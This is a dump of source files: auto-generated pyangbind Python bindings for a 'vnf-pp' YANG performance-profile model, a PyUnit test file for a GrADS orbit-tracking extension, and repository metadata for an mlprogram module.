yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_error(self): """ Getter method for error, mapped from YANG variable /reports/snapshots/error (string) YANG Description: Error, if existent, when obtaining the snapshot. """ return self.__error def _set_error(self, v, load=False): """ Setter method for error, mapped from YANG variable /reports/snapshots/error (string) If this variable is read-only (config: false) in the source YANG file, then _set_error is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_error() directly. YANG Description: Error, if existent, when obtaining the snapshot. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """error must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__error = t if hasattr(self, '_set'): self._set() def _unset_error(self): self.__error = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) id = __builtin__.property(_get_id, _set_id) trial = __builtin__.property(_get_trial, _set_trial) origin = __builtin__.property(_get_origin, _set_origin) evaluations = __builtin__.property(_get_evaluations, _set_evaluations) timestamp = __builtin__.property(_get_timestamp, _set_timestamp) error = __builtin__.property(_get_error, _set_error) _pyangbind_elements = OrderedDict([('id', id), ('trial', trial), ('origin', origin), ('evaluations', evaluations), ('timestamp', timestamp), ('error', error), ]) class yc_reports_vnf_pp__reports(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: List of the reports of a VNF-PP. """ __slots__ = ('_path_helper', '_extmethods', '__id','__test','__snapshots','__timestamp','__error',) _yang_name = 'reports' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__test = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="test", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) self.__snapshots = YANGDynClass(base=YANGListType("id",yc_snapshots_vnf_pp__reports_snapshots, yang_name="snapshots", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="snapshots", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) self.__timestamp = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__error = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports'] def _get_id(self): """ Getter method for id, mapped from YANG variable /reports/id (string) YANG Description: The report unique identifier. """ return self.__id def _set_id(self, v, load=False): """ Setter method for id, mapped from YANG variable /reports/id (string) If this variable is read-only (config: false) in the source YANG file, then _set_id is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_id() directly. YANG Description: The report unique identifier. """ parent = getattr(self, "_parent", None) if parent is not None and load is False: raise AttributeError("Cannot set keys directly when" + " within an instantiated list") if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """id must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__id = t if hasattr(self, '_set'): self._set() def _unset_id(self): self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_test(self): """ Getter method for test, mapped from YANG variable /reports/test (uint32) YANG Description: The identifier of the Test when the snapshots were obtained. """ return self.__test def _set_test(self, v, load=False): """ Setter method for test, mapped from YANG variable /reports/test (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_test is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_test() directly. YANG Description: The identifier of the Test when the snapshots were obtained. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="test", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """test must be of a type compatible with uint32""", 'defined-type': "uint32", 'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="test", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True)""", }) self.__test = t if hasattr(self, '_set'): self._set() def _unset_test(self): self.__test = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="test", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) def _get_snapshots(self): """ Getter method for snapshots, mapped from YANG variable /reports/snapshots (list) YANG Description: List of snapshots contained in a single report. """ return self.__snapshots def _set_snapshots(self, v, load=False): """ Setter method for snapshots, mapped from YANG variable /reports/snapshots (list) If this variable is read-only (config: false) in the source YANG file, then _set_snapshots is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_snapshots() directly. YANG Description: List of snapshots contained in a single report. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("id",yc_snapshots_vnf_pp__reports_snapshots, yang_name="snapshots", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="snapshots", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """snapshots must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("id",yc_snapshots_vnf_pp__reports_snapshots, yang_name="snapshots", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="snapshots", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True)""", }) self.__snapshots = t if hasattr(self, '_set'): self._set() def _unset_snapshots(self): self.__snapshots = YANGDynClass(base=YANGListType("id",yc_snapshots_vnf_pp__reports_snapshots, yang_name="snapshots", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="snapshots", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) def _get_timestamp(self): """ Getter method for timestamp, mapped from YANG variable /reports/timestamp (string) YANG Description: Time (date, hour, minute, second) when the report was created. """ return self.__timestamp def _set_timestamp(self, v, load=False): """ Setter method for timestamp, mapped from YANG variable /reports/timestamp (string) If this variable is read-only (config: false) in the source YANG file, then _set_timestamp is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_timestamp() directly. YANG Description: Time (date, hour, minute, second) when the report was created. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """timestamp must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__timestamp = t if hasattr(self, '_set'): self._set() def _unset_timestamp(self): self.__timestamp = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_error(self): """ Getter method for error, mapped from YANG variable /reports/error (string) YANG Description: Error, if existent, when obtaining the report. """ return self.__error def _set_error(self, v, load=False): """ Setter method for error, mapped from YANG variable /reports/error (string) If this variable is read-only (config: false) in the source YANG file, then _set_error is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_error() directly. YANG Description: Error, if existent, when obtaining the report. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """error must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__error = t if hasattr(self, '_set'): self._set() def _unset_error(self): self.__error = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) id = __builtin__.property(_get_id, _set_id) test = __builtin__.property(_get_test, _set_test) snapshots = __builtin__.property(_get_snapshots, _set_snapshots) timestamp = __builtin__.property(_get_timestamp, _set_timestamp) error = __builtin__.property(_get_error, _set_error) _pyangbind_elements = OrderedDict([('id', id), ('test', test), ('snapshots', snapshots), ('timestamp', timestamp), ('error', error), ]) class vnf_pp(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /vnf-pp. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Yang model for a VNF Performance Profile (VNF-PP). """ __slots__ = ('_path_helper', '_extmethods', '__id','__name','__version','__description','__timestamp','__reports',) _yang_name = 'vnf-pp' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__version = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__description = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__timestamp = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__reports = YANGDynClass(base=YANGListType("id",yc_reports_vnf_pp__reports, yang_name="reports", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="reports", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return [] def _get_id(self): """ Getter method for id, mapped from YANG variable /id (string) YANG Description: Unique identifier of the VNF-PP. """ return self.__id def _set_id(self, v, load=False): """ Setter method for id, mapped from YANG variable /id (string) If this variable is read-only (config: false) in the source YANG file, then _set_id is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_id() directly. YANG Description: Unique identifier of the VNF-PP. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """id must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__id = t if hasattr(self, '_set'): self._set() def _unset_id(self): self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_name(self): """ Getter method for name, mapped from YANG variable /name (string) YANG Description: Name of the VNF-PP. """ return self.__name def _set_name(self, v, load=False): """ Setter method for name, mapped from YANG variable /name (string) If this variable is read-only (config: false) in the source YANG file, then _set_name is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_name() directly. YANG Description: Name of the VNF-PP. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """name must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__name = t if hasattr(self, '_set'): self._set() def _unset_name(self): self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_version(self): """ Getter method for version, mapped from YANG variable /version (string) YANG Description: Version of the VNF-PP. """ return self.__version def _set_version(self, v, load=False): """ Setter method for version, mapped from YANG variable /version (string) If this variable is read-only (config: false) in the source YANG file, then _set_version is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_version() directly. YANG Description: Version of the VNF-PP. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """version must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__version = t if hasattr(self, '_set'): self._set() def _unset_version(self): self.__version = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_description(self): """ Getter method for description, mapped from YANG variable /description (string) YANG Description: Description of the VNF-PP """ return self.__description def _set_description(self, v, load=False): """ Setter method for description, mapped from YANG variable /description (string) If this variable is read-only (config: false) in the source YANG file, then _set_description is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_description() directly. YANG Description: Description of the VNF-PP """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """description must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__description = t if hasattr(self, '_set'): self._set() def _unset_description(self): self.__description = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_timestamp(self): """ Getter method for timestamp, mapped from YANG variable /timestamp (string) YANG Description: Time (date, hour, minute, second) when the VNF-PP was created. """ return self.__timestamp def _set_timestamp(self, v, load=False): """ Setter method for timestamp, mapped from YANG variable /timestamp (string) If this variable is read-only (config: false) in the source YANG file, then _set_timestamp is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_timestamp() directly. YANG Description: Time (date, hour, minute, second) when the VNF-PP was created. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """timestamp must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__timestamp = t if hasattr(self, '_set'): self._set() def _unset_timestamp(self): self.__timestamp = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_reports(self): """ Getter method for reports, mapped from YANG variable /reports (list) YANG Description: List of the reports of a VNF-PP. """ return self.__reports def _set_reports(self, v, load=False): """ Setter method for reports, mapped from YANG variable /reports (list) If this variable is read-only (config: false) in the source YANG file, then _set_reports is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_reports() directly. YANG Description: List of the reports of a VNF-PP. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("id",yc_reports_vnf_pp__reports, yang_name="reports", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="reports", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """reports must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("id",yc_reports_vnf_pp__reports, yang_name="reports", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="reports", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True)""", }) self.__reports = t if hasattr(self, '_set'): self._set() def _unset_reports(self): self.__reports = YANGDynClass(base=YANGListType("id",yc_reports_vnf_pp__reports, yang_name="reports", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="reports", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) id = __builtin__.property(_get_id, _set_id) name = __builtin__.property(_get_name, _set_name) version = __builtin__.property(_get_version, _set_version) description = __builtin__.property(_get_description, _set_description) timestamp = __builtin__.property(_get_timestamp, _set_timestamp) reports = __builtin__.property(_get_reports, _set_reports) _pyangbind_elements = OrderedDict([('id', id), ('name', name), ('version', version), ('description', description), ('timestamp', timestamp), ('reports', reports), ])

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a4624cf08b1443a0bca9acbc9f13b187495daf6a

4,339

py

Python

wgrib2-v0.1.9.4/extensions/orb/ut.py

jprules321/colas

2757d5c077c3306d510488a0134ac4120e2d3fa0

[ "MIT" ]

null

wgrib2-v0.1.9.4/extensions/orb/ut.py

jprules321/colas

2757d5c077c3306d510488a0134ac4120e2d3fa0

[ "MIT" ]

null

wgrib2-v0.1.9.4/extensions/orb/ut.py

jprules321/colas

2757d5c077c3306d510488a0134ac4120e2d3fa0

[ "MIT" ]

null

#!/usr/bin/env python """ Unit tests based oy PyUnit. """ # Add parent directory to python search path # ------------------------------------------ import sys sys.path.insert(0,'..') import os from utudx import utUDX, run #...................................................................... class ut(utUDX): def setUp(self): utUDX.setUp(self,['orb.udxt','orb/orb.udxt']) def test_orb_1_set(self): self.ga("set_orb dt 30") self.assertEqual("30",self.ga.rword(1,4)) self.assertEqual("-1",self.ga.rword(2,4)) self.assertEqual("0", self.ga.rword(3,4)) self.assertEqual("0", self.ga.rword(3,5)) self.assertEqual("0", self.ga.rword(3,8)) self.assertEqual("0", self.ga.rword(3,9)) sys.stdout.write('dt ... ') self.ga("set_orb mark 5") self.assertEqual("30",self.ga.rword(1,4)) self.assertEqual("5",self.ga.rword(2,4)) self.assertEqual("0", self.ga.rword(3,4)) self.assertEqual("0", self.ga.rword(3,5)) self.assertEqual("0", self.ga.rword(3,8)) self.assertEqual("0", self.ga.rword(3,9)) sys.stdout.write('mark ... ') self.ga("set_orb ihalo 2 2") self.assertEqual("30",self.ga.rword(1,4)) self.assertEqual("5",self.ga.rword(2,4)) self.assertEqual("2", self.ga.rword(3,4)) self.assertEqual("2", self.ga.rword(3,5)) self.assertEqual("0", self.ga.rword(3,8)) self.assertEqual("0", self.ga.rword(3,9)) sys.stdout.write('ihalo ... ') self.ga("set_orb jhalo 3 3") self.assertEqual("30",self.ga.rword(1,4)) self.assertEqual("5",self.ga.rword(2,4)) self.assertEqual("2", self.ga.rword(3,4)) self.assertEqual("2", self.ga.rword(3,5)) self.assertEqual("3", self.ga.rword(3,8)) self.assertEqual("3", self.ga.rword(3,9)) sys.stdout.write('jhalo ... ') self.ga("set_orb halo 1") self.assertEqual("30",self.ga.rword(1,4)) self.assertEqual("5",self.ga.rword(2,4)) self.assertEqual("1", self.ga.rword(3,4)) self.assertEqual("1", self.ga.rword(3,5)) self.assertEqual("1", self.ga.rword(3,8)) self.assertEqual("1", self.ga.rword(3,9)) sys.stdout.write('halo ... ') def test_orb_2_track(self): self.ga("set_orb dt 3600") self.assertEqual("3600",self.ga.rword(1,4)) self.ga("orb_track aqua") self.assertEqual("19861231",self.ga.rword(1,7)) self.assertEqual("120000,",self.ga.rword(1,8)) self.assertEqual("19870101",self.ga.rword(1,11)) self.assertEqual("120000",self.ga.rword(1,12)) self.assertEqual(31, int(float(self.ga.rword(2,3)))) self.assertEqual(-17, int(float(self.ga.rword(2,4)))) self.assertEqual(110, int(float(self.ga.rword(9,3)))) self.assertEqual(68, int(float(self.ga.rword(9,4)))) def test_orb_3_mask(self): self.ga("display orb_mask(ts,terra)") self.assertEqual("19861231",self.ga.rword(1,7)) self.assertEqual("120000,",self.ga.rword(1,8)) self.assertEqual("19870101",self.ga.rword(1,11)) self.assertEqual("120000",self.ga.rword(1,12)) self.assertEqual("240",self.ga.rword(2,2)) self.assertEqual("310",self.ga.rword(2,4)) self.assertEqual("10", self.ga.rword(2,6)) self.ga("display orb_mask(ts,terra,300)") self.assertEqual("19861231",self.ga.rword(1,7)) self.assertEqual("120000,",self.ga.rword(1,8)) self.assertEqual("19870101",self.ga.rword(1,11)) self.assertEqual("120000",self.ga.rword(1,12)) self.assertEqual("240",self.ga.rword(2,2)) self.assertEqual("310",self.ga.rword(2,4)) self.assertEqual("10", self.ga.rword(2,6)) self.ga("display orb_mask(ts,terra,300,500,20)") self.assertEqual("19861231",self.ga.rword(1,7)) self.assertEqual("120000,",self.ga.rword(1,8)) self.assertEqual("19870101",self.ga.rword(1,11)) self.assertEqual("120000",self.ga.rword(1,12)) self.assertEqual("240",self.ga.rword(2,2)) self.assertEqual("310",self.ga.rword(2,4)) self.assertEqual("10", self.ga.rword(2,6)) #...................................................................... if __name__ == "__main__": run(ut)

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null

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a46c195a2fc76b06b0674973cb335839f6c4333d

285

py

Python

mlprogram/nn/functional/__init__.py

HiroakiMikami/mlprogram

573e94c567064705fa65267dd83946bf183197de

[ "MIT" ]

9

2020-05-24T11:25:01.000Z

2022-03-28T15:32:10.000Z

mlprogram/nn/functional/__init__.py

HiroakiMikami/mlprogram

573e94c567064705fa65267dd83946bf183197de

[ "MIT" ]

87

2020-05-09T08:56:55.000Z

2022-03-31T14:46:45.000Z

mlprogram/nn/functional/__init__.py

HiroakiMikami/NL2Prog

573e94c567064705fa65267dd83946bf183197de

[ "MIT" ]

3

2021-02-22T20:38:29.000Z

2021-11-11T18:48:44.000Z

